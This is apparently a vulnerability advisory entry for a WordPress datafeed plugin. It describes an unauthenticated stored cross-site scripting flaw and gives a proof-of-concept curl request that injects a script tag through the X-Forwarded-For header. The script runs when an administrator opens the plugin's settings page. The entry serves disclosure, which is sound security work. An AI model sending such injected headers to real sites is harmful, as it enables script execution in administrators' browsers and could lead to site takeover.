The plugin does not sanitise and escape a header when processing request to generate analytics data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against a logged in admin viewing the plugin's settings
With a feed set in the plugin, open the URL, invoke the command below curl 'https://example.com/wp-admin/admin-ajax.php' \ --data 'action=track_user_click&feedId=1' \ -H 'X-Forwarded-For: "><script>alert("xss");</script>' The XSS will be triggered when an admin visits the plugin's settings (/wp-admin/admin.php?page=datafeed-settings) Note: To set a feed, simply import the following CSV via the plugin: categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price categoryName,awDeepLink,merchantDeepLink,awImageUrl,description,productName,deliveryCost,currency,price
cydave
cydave
Yes
2022-06-16 (about 7 months ago)
2022-06-16 (about 7 months ago)
2022-07-27 (about 6 months ago)